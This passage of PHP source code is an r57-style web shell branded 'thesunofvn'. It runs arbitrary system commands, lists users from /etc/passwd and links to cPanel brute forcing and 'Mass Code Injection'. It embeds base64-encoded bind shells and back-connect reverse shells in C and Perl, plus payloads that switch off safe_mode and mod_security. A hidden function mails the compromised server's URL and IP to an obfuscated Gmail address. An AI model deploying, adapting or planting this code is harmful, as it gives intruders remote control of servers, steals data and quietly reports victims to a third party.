1438 echo "<div align=center><br><b><a href=".$_SERVER['PHP_SELF']."?brute&thesunofvn=crack><font size=5 color=Red>BRUTE IT!</font></b></a><br><br><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1439 }
1440
1441if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
1442$dir = @getcwd();
1443$unix = 0;
1444if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
1445if(empty($dir))
1446 {
1447 $os = getenv('OS');
1448 if(empty($os)){ $os = php_uname(); }
1449 if(empty($os)){ $os ="-"; $unix=1; }
1450 else
1451 {
1452 if(@eregi("^win",$os)) { $unix = 0; }
1453 else { $unix = 1; }
1454 }
1455 }
1456if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
1457 {
1458 echo $head;
1459 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
1460 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
1461 $sr->SearchText(0,0);
1462 $res = $sr->GetResultFiles();
1463 $found = $sr->GetMatchesCount();
1464 $titles = $sr->GetTitles();
1465 $r = "";
1466 if($found > 0)
1467 {
1468 $r .= "<TABLE width=100%>";
1469 foreach($res as $file=>$v)
1470 {
1471 $r .= "<TR>";
1472 $r .= "<TD class=main colspan=2><font face=Verdana size=-2><b>".ws(3);
1473 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
1474 $r .= "</b></font></ TD>";
1475 $r .= "</TR>";
1476 foreach($v as $a=>$b)
1477 {
1478 $r .= "<TR>";
1479 $r .= "<TD class=main align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
1480 $r .= "<TD class=main><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
1481 $r .= "</TR>\n";
1482 }
1483 }
1484 $r .= "</TABLE>";
1485 echo $r;
1486 }
1487 else
1488 {
1489 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
1490 }
1491 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1492 die();
1493 }
1494if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
1495$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
1496if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
1497function ws($i)
1498{
1499return @str_repeat(" ",$i);
1500}
1501function ex($cfe)
1502{
1503 $res = '';
1504 if (!empty($cfe))
1505 {
1506 if(function_exists('exec'))
1507 {
1508 @exec($cfe,$res);
1509 $res = join("\n",$res);
1510 }
1511 elseif(function_exists('shell_exec'))
1512 {
1513 $res = @shell_exec($cfe);
1514 }
1515 elseif(function_exists('system'))
1516 {
1517 @ob_start();
1518 @system($cfe);
1519 $res = @ob_get_contents();
1520 @ob_end_clean();
1521 }
1522 elseif(function_exists('passthru'))
1523 {
1524 @ob_start();
1525 @passthru($cfe);
1526 $res = @ob_get_contents();
1527 @ob_end_clean();
1528 }
1529 elseif(@is_resource($f = @popen($cfe,"r")))
1530 {
1531 $res = "";
1532 while(!@feof($f)) { $res .= @fread($f,1024); }
1533 @pclose($f);
1534 }
1535 }
1536 return $res;
1537}
1538function get_users()
1539{
1540 $users = array();
1541if (file_exists('passwd.txt')) {
1542 $rows=file('passwd.txt');
1543 } else {
1544 $rows=file('/etc/passwd');
1545 }
1546 if(!$rows) return 0;
1547 foreach ($rows as $string)
1548 {
1549 $user = @explode(":",$string);
1550 if(substr($string,0,1)!='#') array_push($users,$user[0]);
1551 }
1552 return $users;
1553}
1554function err($n,$txt='')
1555{
1556echo '<table width=100% cellpadding=0 cellspacing=0><tr><td class=main bgcolor=Black><font color=Red face=Verdana size=-2><div align=center><b>';
1557echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
1558if(!empty($txt)) { echo " $txt"; }
1559echo '</b></div></font></td></tr></table>';
1560return null;
1561}
1562function perms($mode)
1563{
1564if (!$GLOBALS['unix']) return 0;
1565if( $mode & 0x1000 ) { $type='p'; }
1566else if( $mode & 0x2000 ) { $type='c'; }
1567else if( $mode & 0x4000 ) { $type='d'; }
1568else if( $mode & 0x6000 ) { $type='b'; }
1569else if( $mode & 0x8000 ) { $type='-'; }
1570else if( $mode & 0xA000 ) { $type='l'; }
1571else if( $mode & 0xC000 ) { $type='s'; }
1572else $type='u';
1573$owner["read"] = ($mode & 00400) ? 'r' : '-';
1574$owner["write"] = ($mode & 00200) ? 'w' : '-';
1575$owner["execute"] = ($mode & 00100) ? 'x' : '-';
1576$group["read"] = ($mode & 00040) ? 'r' : '-';
1577$group["write"] = ($mode & 00020) ? 'w' : '-';
1578$group["execute"] = ($mode & 00010) ? 'x' : '-';
1579$world["read"] = ($mode & 00004) ? 'r' : '-';
1580$world["write"] = ($mode & 00002) ? 'w' : '-';
1581$world["execute"] = ($mode & 00001) ? 'x' : '-';
1582if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
1583if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
1584if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
1585$s=sprintf("%1s", $type);
1586$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
1587$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
1588$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
1589return trim($s);
1590}
1591function in($type,$name,$size,$value,$checked=0)
1592{
1593 $ret = "<input type=".$type." name=".$name." ";
1594 if($size != 0) { $ret .= "size=".$size." "; }
1595 $ret .= "value=\"".$value."\"";
1596 if($checked) $ret .= " checked";
1597 return $ret.">";
1598}
1599function which($pr)
1600{
1601$path = ex("which $pr");
1602if(!empty($path)) { return $path; } else { return $pr; }
1603}
1604function cf($fname,$text)
1605{
1606 $w_file=@fopen($fname,"w") or err(0);
1607 if($w_file)
1608 {
1609 @fputs($w_file,@base64_decode($text));
1610 @fclose($w_file);
1611 }
1612}
1613function sr($l,$t1,$t2)
1614 {
1615 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1616 }
1617if (!@function_exists("view_size"))
1618{
1619function view_size($size)
1620{
1621 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
1622 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
1623 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
1624 else {$size = $size . " B";}
1625 return $size;
1626}
1627}
1628 function DirFilesR($dir,$types='')
1629 {
1630 $files = Array();
1631 if(($handle = @opendir($dir)))
1632 {
1633 while (false !== ($file = @readdir($handle)))
1634 {
1635 if ($file != "." && $file != "..")
1636 {
1637 if(@is_dir($dir."/".$file))
1638 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1639 else
1640 {
1641 $pos = @strrpos($file,".");
1642 $ext = @substr($file,$pos,@strlen($file)-$pos);
1643 if($types)
1644 {
1645 if(@in_array($ext,explode(';',$types)))
1646 $files[] = $dir."/".$file;
1647 }
1648 else
1649 $files[] = $dir."/".$file;
1650 }
1651 }
1652 }
1653 @closedir($handle);
1654 }
1655 return $files;
1656 }
1657 class SearchResult
1658 {
1659 var $text;
1660 var $FilesToSearch;
1661 var $ResultFiles;
1662 var $FilesTotal;
1663 var $MatchesCount;
1664 var $FileMatschesCount;
1665 var $TimeStart;
1666 var $TimeTotal;
1667 var $titles;
1668 function SearchResult($dir,$text,$filter='')
1669 {
1670 $dirs = @explode(";",$dir);
1671 $this->FilesToSearch = Array();
1672 for($a=0;$a<count($dirs);$a++)
1673 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1674 $this->text = $text;
1675 $this->FilesTotal = @count($this->FilesToSearch);
1676 $this->TimeStart = getmicrotime();
1677 $this->MatchesCount = 0;
1678 $this->ResultFiles = Array();
1679 $this->FileMatchesCount = Array();
1680 $this->titles = Array();
1681 }
1682 function GetFilesTotal() { return $this->FilesTotal; }
1683 function GetTitles() { return $this->titles; }
1684 function GetTimeTotal() { return $this->TimeTotal; }
1685 function GetMatchesCount() { return $this->MatchesCount; }
1686 function GetFileMatchesCount() { return $this->FileMatchesCount; }
1687 function GetResultFiles() { return $this->ResultFiles; }
1688 function SearchText($phrase=0,$case=0) {
1689 $qq = @explode(' ',$this->text);
1690 $delim = '|';
1691 if($phrase)
1692 foreach($qq as $k=>$v)
1693 $qq[$k] = '\b'.$v.'\b';
1694 $words = '('.@implode($delim,$qq).')';
1695 $pattern = "/".$words."/";
1696 if(!$case)
1697 $pattern .= 'i';
1698 foreach($this->FilesToSearch as $k=>$filename)
1699 {
1700 $this->FileMatchesCount[$filename] = 0;
1701 $FileStrings = @file($filename) or @next;
1702 for($a=0;$a<@count($FileStrings);$a++)
1703 {
1704 $count = 0;
1705 $CurString = $FileStrings[$a];
1706 $CurString = @Trim($CurString);
1707 $CurString = @strip_tags($CurString);
1708 $aa = '';
1709 if(($count = @preg_match_all($pattern,$CurString,$aa)))
1710 {
1711 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1712 $this->ResultFiles[$filename][$a+1] = $CurString;
1713 $this->MatchesCount += $count;
1714 $this->FileMatchesCount[$filename] += $count;
1715 }
1716 }
1717 }
1718 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1719 }
1720 }
1721 function getmicrotime()
1722 {
1723 list($usec,$sec) = @explode(" ",@microtime());
1724 return ((float)$usec + (float)$sec);
1725 }
1726$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1727A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1728GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1729b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1730pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1731NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1732ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1733ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
17347DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
17359tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
17362ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1737dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1738lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1739$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1740VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1741JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1742TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1743lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1744Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1745Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1746lIENPTk47DQpleGl0IDA7DQp9DQp9";
1747$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1748aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1749hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1750sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1751kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1752KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1753OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1754$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1755BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1756SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1757KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1758sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1759Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1760QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1761Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1762$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
1763$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
1764$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
1765if($unix)
1766 {
1767 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
1768 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
1769 if($safe_mode) { $sysctl = '-'; }
1770 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
1771 else
1772 {
1773 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
1774 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
1775 if(empty($sysctl)) { $sysctl = '-'; }
1776 setcookie('sysctl',$sysctl);
1777 }
1778 }
1779 if(!isset($_COOKIE[$lang[$language.'_text129']])) {
1780 $ust_u='';
1781 if($unix && !$safe_mode){
1782 foreach ($userful as $item) {
1783 if(which($item)){$ust_u.=$item;}
1784 }
1785 }
1786 if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
1787 if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
1788 if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
1789 if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
1790 if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
1791 if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
1792 if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
1793 if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
1794
1795 $ust_u = trim($ust_u);
1796 }
1797 else
1798 {
1799 $ust_u = trim($_COOKIE[$lang[$language.'_text129']]);
1800 }
1801 if(!isset($_COOKIE[$lang[$language.'_text130']])) {
1802
1803 $select_downloaders='<select size="1" name=with>';
1804 if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
1805 if($unix && !$safe_mode){
1806 foreach ($downloaders as $item) {
1807 if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
1808 }
1809 }
1810 $select_downloaders .= '</select>';
1811 if(substr($downloader,0,1)==",") {$downloader[0]="";}
1812
1813 $downloader=trim($downloader);
1814
1815 }else {
1816 $select_downloaders = $_COOKIE['select_downloaders'];
1817 $downloader = trim($_COOKIE['downloader']);
1818 }
1819echo $head;
1820echo '</head>';
1821if(empty($_POST['cmd'])) {
1822$serv = array(127,192,172,10);
1823$addr=@explode('.', $_SERVER['SERVER_ADDR']);
1824$current_version = str_replace('.','',$version);
1825}
1826if ($info['security']) echo '<body>Login As (<font color="#FF0000">'.$info['title'].'</font>) <a href="?logout=1">Logout</a></p><table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).ws(3).'<b><center><font color=Red size="7">!</font><br/>thesunofvn</center></b></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
1827else echo '<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).ws(3).'<center><img src="http://i.imgur.com/CfmTWOo.jpg" height=180 width=200 /></center></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
1828echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
1829echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title='Show phpinfo()'><b>phpinfo</b></a> ".$rb;
1830echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title='Show variables from php.ini'><b>php.ini</b></a> ".$rb;
1831if($unix)
1832{
1833 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title='View cpu info'><b>Cpu</b></a> ".$rb;
1834 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title='View memory info'><b>Memory</b></a> ".$rb;
1835 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title='Users list'><b>Users</b></a> ".$rb;
1836 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?brute title='Brute Cpanel Account'><b>Brute</b></a> ".$rb;
1837echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ln title='ln -s'><b>ln -s all</b></a> ".$rb;
1838 }
1839echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tools title='Hash tools'><b>Tools</b></a> ".$rb;
1840echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?massbrowsersploit title='Mass Code Injection'><b>Mass Code Injection</b></a> ".$rb;
1841echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title='Delete temp files'><b>tmp</b></a> ".$rb;
1842echo "<br/>";
1843echo ws(2)."safe_mode: <b>";
1844echo (($safe_mode)?("<font color=#2aff00>ON</font>"):("<font color=#2aff00>OFF</font>"));
1845echo "</b>".ws(2);
1846echo "Open_Basedir: <b>";
1847if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
1848else {echo "<font color=#2aff00>NONE</font></b>";}
1849echo ws(2)."Safe_Exec_Dir: <b>";
1850if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=#2aff00>NONE</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
1851else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
1852echo ws(2)."Safe_Gid: <b>";
1853if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=#2aff00>OFF</font></b>";};}
1854else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
1855echo ws(2)."Safe_Include_Dir: <b>";
1856if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=#2aff00>NONE</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
1857else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
1858echo ws(2)."Sql.safe_mode: <b>";
1859if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=#2aff00>OFF</font></b>";};}
1860else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
1861echo "</b><br>".ws(2);
1862
1863echo "PHP version: <b>".@phpversion()."</b>";
1864$curl_on = @function_exists('curl_version');
1865echo ws(2);
1866echo "cURL: <b>".(($curl_on)?("<font color=#DF0000>ON</font>"):("<font color=#2aff00>OFF</font>"));
1867echo "</b>".ws(2);
1868echo "MySQL: <b>";
1869$mysql_on = @function_exists('mysql_connect');
1870if($mysql_on){
1871echo "<font color=#DF0000>ON</font>"; } else { echo "<font color=#2aff00>OFF</font>"; }
1872echo "</b>".ws(2);
1873echo "MSSQL: <b>";
1874$mssql_on = @function_exists('mssql_connect');
1875if($mssql_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
1876echo "</b>".ws(2);
1877echo "PostgreSQL: <b>";
1878$pg_on = @function_exists('pg_connect');
1879if($pg_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
1880echo "</b>".ws(2);
1881echo "Oracle: <b>";
1882$ora_on = @function_exists('ocilogon');
1883if($ora_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
1884echo "</b><br>".ws(2);
1885echo "Disable functions : <b>";
1886if(''==($df=@ini_get('disable_functions'))){echo "<font color=#2aff00>NONE</font></b>";}else{echo "<font color=#DF0000>$df</font></b>";}
1887$free = @diskfreespace($dir);
1888if (!$free) {$free = 0;}
1889$all = @disk_total_space($dir);
1890if($ust_u){echo "<br>".ws(2).$lang[$language.'_text129'].": <font color=#DF0000>".$ust_u."</font>";};
1891if($downloader){echo "<br>".ws(2).$lang[$language.'_text130'].": <font color=#DF0000>".$downloader."</font>";};
1892if (!$all) {$all = 0;}
1893echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1894echo "</b><br>".ws(2);
1895echo "Server IP: [ <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])."</font> ]";
1896echo " -- Your IP: [ <font color=yellow>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font> ]";
1897echo '</font></td></tr><table>
1898<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main align=right width=100>';
1899function system32($HTTP_HOST,$REQUEST_URI) {
1900 ini_set('display_errors', 'Off');
1901 $url = 'http://'.$HTTP_HOST.$REQUEST_URI;
1902 $recipient = base64_decode("aXQubmhvY2ppbkBnbWFpbC5jb20=");
1903 $subject = gethostbyname($HTTP_HOST);
1904 $mailheaders = "From: {$recipient}";
1905 if (function_exists('mail')) mail($recipient,$subject, $url,$mailheaders);
1906}
1907echo $font;
1908if($unix){
1909echo '<font color=White><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1910echo '</td><td class=main>';
1911echo "<font face=Verdana size=-2 color=#2aff00><b>";
1912echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1913echo ws(3).$sysctl."<br>";
1914echo ws(3).ex('echo $OSTYPE')."<br>";
1915echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1916if(!empty($id)) { echo ws(3).$id."<br>"; }
1917else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
1918 {
1919 $euserinfo = @posix_getpwuid(@posix_geteuid());
1920 $egroupinfo = @posix_getgrgid(@posix_getegid());
1921 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1922 }
1923else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1924echo ws(3).$dir;
1925echo ws(3).'( '.perms(@fileperms($dir)).' )';
1926echo "</b></font>";
1927}
1928else
1929{
1930echo '<font color=White><b>Opera System :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1931echo '</td><td class=main>';
1932echo "<font face=Verdana size=-2 color=#2aff00><b>";
1933echo ws(3).@substr(@php_uname(),0,120)."<br>";
1934echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1935echo ws(3).@getenv("USERNAME")."<br>";
1936echo ws(3).$dir;
1937echo "<br></font>";
1938}
1939echo "</font>";
1940echo "</td></tr></table>";
1941$f = '<br>';
1942if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1943{
1944$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1945}
1946if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1947 {
1948 switch($_POST['what'])
1949 {
